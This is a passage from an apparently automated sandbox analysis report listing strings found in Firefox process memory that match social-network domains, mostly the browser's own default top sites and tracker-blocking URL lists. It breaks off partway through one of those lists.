                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "*://www.facebook.com/platform/impression.php*" equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://*.adsafeprotected.com/*/unit/*toolkit.telemetry.untrustedModulesPing.frequency*://pubads.g.doubleclick.net/gampad/*xml_vmap2**://securepubads.g.doubleclick.net/gampad/*ad**://ads.stickyadstv.com/auto-user-sync*toolkit.telemetry.testing.disableFuzzingDelay*://pubads.g.doubleclick.net/gampad/*ad-blk**://*.adsafeprotected.com/*/imp/**://www.facebook.com/platform/impression.php*toolkit.telemetry.archive.enabled equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://connect.facebook.net/*/all.js*@mozilla.org/network/file-output-stream;1https://smartblock.firefox.etp/play.svg*://static.chartbeat.com/js/chartbeat_video.js@mozilla.org/addons/addon-manager-startup;1FileUtils_openSafeFileOutputStream*://static.chartbeat.com/js/chartbeat.js*://static.criteo.net/js/ld/publishertag.jsFileUtils_openAtomicFileOutputStreamwebcompat-reporter%40mozilla.org:1.5.1*://*.imgur.io/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js@mozilla.org/network/safe-file-output-stream;1FileUtils_closeAtomicFileOutputStreamhttps://smartblock.firefox.etp/facebook.svg*://www.everestjs.net/static/st.v3.js*webcompat-reporter@mozilla.org.xpipictureinpicture%40mozilla.org:1.0.0*://track.adform.net/serving/scripts/trackpoint/*://pub.doubleverify.com/signals/pub.js*executeIDB/promise</transaction.oncomplete equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3213102159.00000253EBB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E94A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E87EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3213102159.00000253EBB2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E94A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000003.2821731492.00000253ED08C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3323867690.00000253EE131000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3323867690.00000253EE187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: FileUtils_closeSafeFileOutputStream*://cdn.branch.io/branch-latest.min.js*resource://gre/modules/addons/XPIProvider.jsm@mozilla.org/network/atomic-file-output-stream;1*://*.imgur.com/js/vendor.*.bundle.js*://web-assets.toggl.com/app/assets/scripts/*.js*://libs.coremetrics.com/eluminate.jsresource://gre/modules/FileUtils.sys.mjs*://auth.9c9media.ca/auth/main.js*://c.amazon-adsystem.com/aax2/apstag.js*://connect.facebook.net/*/sdk.js**://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.js*://ssl.google-analytics.com/ga.js*://www.googletagservices.com/tag/js/gpt.js**://s0.2mdn.net/instream/html5/ima3.js*://static.adsafeprotected.com/iasPET.1.js*://pagead2.googlesyndication.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://cdn.optimizely.com/public/*.js*://*.vidible.tv/*/vidible-min.js**://s.webtrends.com/js/advancedLinkTracking.jsopenIDB/</request.onupgradeneeded equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", 